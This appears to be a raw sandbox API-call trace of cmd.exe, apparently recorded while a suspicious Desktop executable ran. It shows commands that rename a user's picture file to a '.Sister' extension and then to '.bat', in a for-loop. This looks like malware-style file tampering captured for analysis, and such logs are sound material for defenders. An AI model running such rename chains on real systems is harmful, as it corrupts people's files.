[0292.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cd9fd0 [0292.764] GetProcessHeap () returned 0x21ed8c70000 [0292.764] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cd9fd0, Size=0x30) returned 0x21ed8cd9fd0 [0292.764] GetProcessHeap () returned 0x21ed8c70000 [0292.764] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cd9fd0) returned 0x30 [0292.764] GetProcessHeap () returned 0x21ed8c70000 [0292.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cda010 [0292.764] malloc (_Size=0x1ff9c) returned 0x21ed981fb40 [0292.764] GetProcessHeap () returned 0x21ed8c70000 [0292.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45bc0 [0292.764] ??_V@YAXPEAX@Z () returned 0x1 [0292.764] malloc (_Size=0x1ff9c) returned 0x21ed981fb40 [0292.764] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0292.764] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0292.764] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cca0 [0292.765] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0292.765] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9152ec0, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9152ec0, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.765] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.765] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0264410, ftCreationTime.dwHighDateTime=0x1d5ec5b, ftLastAccessTime.dwLowDateTime=0xd7d8d080, ftLastAccessTime.dwHighDateTime=0x1d5ed43, ftLastWriteTime.dwLowDateTime=0xd7d8d080, ftLastWriteTime.dwHighDateTime=0x1d5ed43, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x4, dwReserved1=0x7, cFileName="DCw650z.bmp", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.765] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.765] malloc (_Size=0x1ff9c) returned 0x21ed983faf0 [0292.766] ??_V@YAXPEAX@Z () returned 0x21ed983faf0 [0292.767] GetProcessHeap () returned 0x21ed8c70000 [0292.767] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e90 [0292.767] ??_V@YAXPEAX@Z () returned 0x1 [0292.767] ??_V@YAXPEAX@Z () returned 0x1 [0292.767] GetProcessHeap () returned 0x21ed8c70000 [0292.767] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cda010, Size=0x130) returned 0x21ed8cda010 [0292.767] GetProcessHeap () returned 0x21ed8c70000 [0292.767] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cda010) returned 0x130 [0292.767] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0292.767] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.767] GetFileType (hFile=0x50) returned 0x2 [0292.767] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.767] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0292.767] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.767] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0292.772] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.772] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.773] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0292.773] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.773] GetFileType (hFile=0x50) returned 0x2 [0292.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.773] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0292.773] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.773] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0292.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.774] GetFileType (hFile=0x50) returned 0x2 [0292.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.774] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.774] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cd9bc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cd9bc0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.775] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"DCw650z.bmp\" \"DCw650z.bmp.Sister\" ") returned 36 [0292.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.775] GetFileType (hFile=0x50) returned 0x2 [0292.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.775] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.775] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x24) returned 1 [0292.775] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0292.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.776] GetFileType (hFile=0x50) returned 0x2 [0292.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.776] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.776] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.776] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0292.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.776] GetFileType (hFile=0x50) returned 0x2 [0292.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.776] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.777] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0292.777] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0292.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.777] GetFileType (hFile=0x50) returned 0x2 [0292.777] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.777] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.778] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0292.778] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0292.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.778] GetFileType (hFile=0x50) returned 0x2 [0292.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.778] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.778] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0292.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.784] GetFileType (hFile=0x50) returned 0x2 [0292.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.784] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.784] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cd9fe0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cd9fe0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.785] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"DCw650z.bmp.Sister\" \"DCw650z.bat\" ") returned 36 [0292.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.785] GetFileType (hFile=0x50) returned 0x2 [0292.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.785] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.785] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x24) returned 1 [0292.785] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0292.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.785] GetFileType (hFile=0x50) returned 0x2 [0292.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.786] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0292.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.786] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0292.790] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.790] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.790] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.790] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.790] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.791] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.791] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.791] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.791] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.791] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.791] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.791] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.791] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.791] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.791] ??_V@YAXPEAX@Z () returned 0x1 [0292.791] GetProcessHeap () returned 0x21ed8c70000 [0292.791] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa0) returned 0x21ed8c7d280 [0292.791] GetProcessHeap () returned 0x21ed8c70000 [0292.791] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d280, Size=0x58) returned 0x21ed8c7d280 [0292.791] GetProcessHeap () returned 0x21ed8c70000 [0292.791] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d280) returned 0x58 [0292.791] GetProcessHeap () returned 0x21ed8c70000 [0292.791] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x60) returned 0x21ed8d64340 [0292.793] GetProcessHeap () returned 0x21ed8c70000 [0292.793] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa0) returned 0x21ed8c72720 [0292.793] GetProcessHeap () returned 0x21ed8c70000 [0292.793] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72720, Size=0x58) returned 0x21ed8c72720 [0292.793] GetProcessHeap () returned 0x21ed8c70000 [0292.793] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72720) returned 0x58 [0292.793] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.793] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.793] GetProcessHeap () returned 0x21ed8c70000 [0292.793] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cee0 [0292.793] GetProcessHeap () returned 0x21ed8c70000 [0292.793] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b040 [0292.793] _wcsicmp (_String1="DCw650z.bmp", _String2=".") returned 54 [0292.793] _wcsicmp (_String1="DCw650z.bmp", _String2="..") returned 54 [0292.793] GetFileAttributesW (lpFileName="DCw650z.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp")) returned 0x20 [0292.794] GetProcessHeap () returned 0x21ed8c70000 [0292.794] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cda150 [0292.795] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cda160 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.795] SetErrorMode (uMode=0x0) returned 0x0 [0292.795] SetErrorMode (uMode=0x1) returned 0x0 [0292.795] GetFullPathNameW (in: lpFileName="DCw650z.bmp", nBufferLength=0x7fe7, lpBuffer=0x21ed981fb40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp", lpFilePart=0xa6cf4fd660*="DCw650z.bmp") returned 0x24 [0292.795] SetErrorMode (uMode=0x0) returned 0x1 [0292.795] GetProcessHeap () returned 0x21ed8c70000 [0292.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c8a0 [0292.795] _wcsicmp (_String1="DCw650z.bmp", _String2=".") returned 54 [0292.795] _wcsicmp (_String1="DCw650z.bmp", _String2="..") returned 54 [0292.795] GetFileAttributesW (lpFileName="DCw650z.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp")) returned 0x20 [0292.795] ??_V@YAXPEAX@Z () returned 0x1 [0292.795] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.795] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.795] malloc (_Size=0xffce) returned 0x21ed982fb20 [0292.795] ??_V@YAXPEAX@Z () returned 0x21ed982fb20 [0292.796] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp")) returned 0x20 [0292.796] malloc (_Size=0xffce) returned 0x21ed983fb00 [0292.796] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0292.796] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5b050, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5b050) returned 0x21ed8c7cca0 [0292.796] malloc (_Size=0xffce) returned 0x21ed984fae0 [0292.796] ??_V@YAXPEAX@Z () returned 0x21ed984fae0 [0292.797] ??_V@YAXPEAX@Z () returned 0x1 [0292.797] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0292.798] FindNextFileW (in: hFindFile=0x21ed8c7cca0, lpFindFileData=0x21ed8d5b050 | out: lpFindFileData=0x21ed8d5b050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0264410, ftCreationTime.dwHighDateTime=0x1d5ec5b, ftLastAccessTime.dwLowDateTime=0xd7d8d080, ftLastAccessTime.dwHighDateTime=0x1d5ed43, ftLastWriteTime.dwLowDateTime=0xd7d8d080, ftLastWriteTime.dwHighDateTime=0x1d5ed43, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="DCw650z.bmp", cAlternateFileName="")) returned 0 [0292.799] GetLastError () returned 0x12 [0292.799] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0292.800] ??_V@YAXPEAX@Z () returned 0x1 [0292.800] ??_V@YAXPEAX@Z () returned 0x1 [0292.801] ??_V@YAXPEAX@Z () returned 0x1 [0292.801] ??_V@YAXPEAX@Z () returned 0x1 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cf40 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95b80, Size=0x16) returned 0x21ed8c95840 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95840) returned 0x16 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x20) returned 0x21ed8d45c50 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c50) returned 0x20 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bf00 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bf00, Size=0xb2) returned 0x21ed8c96040 [0292.801] GetProcessHeap () returned 0x21ed8c70000 [0292.801] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96040) returned 0xb2 [0292.802] GetProcessHeap () returned 0x21ed8c70000 [0292.802] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cea140 [0292.803] GetProcessHeap () returned 0x21ed8c70000 [0292.803] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cea140, Size=0x30) returned 0x21ed8cea140 [0292.803] GetProcessHeap () returned 0x21ed8c70000 [0292.803] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cea140) returned 0x30 [0292.803] GetProcessHeap () returned 0x21ed8c70000 [0292.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cea180 [0292.803] malloc (_Size=0x1ff9c) returned 0x21ed981fb40 [0292.803] GetProcessHeap () returned 0x21ed8c70000 [0292.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96100 [0292.803] GetProcessHeap () returned 0x21ed8c70000 [0292.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c770 [0292.804] ??_V@YAXPEAX@Z () returned 0x1 [0292.804] malloc (_Size=0x1ff9c) returned 0x21ed981fb40 [0292.804] GetProcessHeap () returned 0x21ed8c70000 [0292.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b030 [0292.804] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed981fb40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0292.804] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cca0 [0292.804] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0292.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.805] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cca0 [0292.805] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0292.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0292.805] malloc (_Size=0x1ff9c) returned 0x21ed983faf0 [0292.805] ??_V@YAXPEAX@Z () returned 0x21ed983faf0 [0292.805] GetProcessHeap () returned 0x21ed8c70000 [0292.805] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67530 [0292.806] ??_V@YAXPEAX@Z () returned 0x1 [0292.806] ??_V@YAXPEAX@Z () returned 0x1 [0292.806] GetProcessHeap () returned 0x21ed8c70000 [0292.806] 